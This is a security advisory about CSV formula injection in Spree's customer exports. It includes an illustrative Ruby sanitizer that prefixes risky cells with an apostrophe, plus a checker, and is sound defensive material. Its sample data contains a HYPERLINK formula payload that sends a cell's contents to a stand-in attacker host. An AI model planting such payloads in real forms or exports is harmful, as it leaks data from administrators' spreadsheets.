spree is vulnerable to CSV Injection
61
Medium Risk
Spree's CSV export models write customer- and admin-entered fields into CSV rows without neutralizing the characters that spreadsheets treat as the start of a formula. Before the fix, an attacker who registered as a customer could place values beginning with =, +, -, @, tab, or newline in name, email, address, or phone fields; when an administrator later opens the exported file in Excel or LibreOffice Calc, those cells are evaluated as formulas instead of being displayed as text. An injected formula can exfiltrate other cell contents from the open workbook or, in spreadsheet configurations that still allow Dynamic Data Exchange (DDE), trigger OS command execution. The patch routes every exported row through a new Spree::CSV::FormulaSanitizer, which prefixes risky cells with an apostrophe so the spreadsheet treats them as text.
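The following is an added example, not Spree's code: the advisory names Spree::CSV::FormulaSanitizer but does not show its implementation, so the CsvFormulaGuard module, the constructed sample rows and the formula_cells check below are this example's own. It shows the class of fix described above (apostrophe-prefixing cells that lead with a formula trigger) applied to a small customer export, with a check that reports which cells of a given CSV a spreadsheet would still evaluate as formulas.

```ruby
require "csv"

# Added illustration of the fix class the advisory describes; it is not
# Spree::CSV::FormulaSanitizer and does not claim to match its behaviour.
module CsvFormulaGuard
  # Characters a spreadsheet interprets as the start of a formula when they
  # lead a cell. Tab, CR and LF are included because some importers use them
  # to split one CSV cell into several, so the real trigger can land in the
  # next column even though the cell itself started with whitespace.
  TRIGGERS = ["=", "+", "-", "@", "\t", "\r", "\n"].freeze

  # Prefix a risky cell with an apostrophe so Excel/Calc store it as text.
  # The check runs on the first non-blank character, which is deliberately
  # conservative: "+44 20 ..." phone numbers and "-5" are prefixed too,
  # which is the usual trade-off of this mitigation (the apostrophe stays
  # in the data for any non-spreadsheet consumer of the file).
  def self.sanitize(value)
    return value unless value.is_a?(String)
    TRIGGERS.include?(value.lstrip[0]) ? "'#{value}" : value
  end

  def self.sanitize_row(row)
    row.map { |cell| sanitize(cell) }
  end

  # Constructed sample rows (not real data): an ordinary customer followed by
  # one who registered with formula payloads in the name and phone fields.
  # The HYPERLINK form is the classic way a formula leaks another cell (A1)
  # to an attacker-controlled host once an admin clicks the cell.
  SAMPLE_ROWS = [
    ["Ada Lovelace", "ada@example.test", "+44 20 7946 0000"],
    ['=HYPERLINK("http://attacker.test/?"&A1,"click")', "x@example.test", "-1+1"]
  ].freeze

  # Build the export. sanitize: false reproduces the pre-fix behaviour the
  # advisory describes; the default routes every row through sanitize_row.
  def self.export(rows, sanitize: true)
    CSV.generate do |csv|
      csv << %w[name email phone]
      rows.each { |row| csv << (sanitize ? sanitize_row(row) : row) }
    end
  end

  # Practitioner's check: parse an export back and list every cell that a
  # spreadsheet would still treat as a formula. Run this against a sample
  # export after upgrading to confirm the fix actually reaches every column.
  def self.formula_cells(csv_text)
    CSV.parse(csv_text).flat_map do |row|
      row.select { |cell| cell.is_a?(String) && TRIGGERS.include?(cell.lstrip[0]) }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  unsafe = CsvFormulaGuard.export(CsvFormulaGuard::SAMPLE_ROWS, sanitize: false)
  safe   = CsvFormulaGuard.export(CsvFormulaGuard::SAMPLE_ROWS)
  puts "Unsanitized export:\n#{unsafe}"
  puts "Cells a spreadsheet would evaluate: #{CsvFormulaGuard.formula_cells(unsafe).inspect}"
  puts "Sanitized export:\n#{safe}"
  puts "Cells a spreadsheet would evaluate: #{CsvFormulaGuard.formula_cells(safe).inspect}"
end
```

The apostrophe approach is what the advisory says the Spree patch uses; the alternatives seen elsewhere (prefixing a tab, or quoting the cell and escaping embedded quotes) trade the same way. Whichever is used, the export-side fix is only half of the control: administrators opening vendor exports should also keep DDE and external links disabled in their spreadsheet settings.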
You are affected if you are using a version that falls within the vulnerable range.
spree is vulnerable to CSV Injection in versions 5.2.1 - 5.2.7, 5.3.0 - 5.3.5 and 5.4.0 - 5.4.2.
Upgrade the spree gem to a patched release, that is, the first version published after the affected range you are on.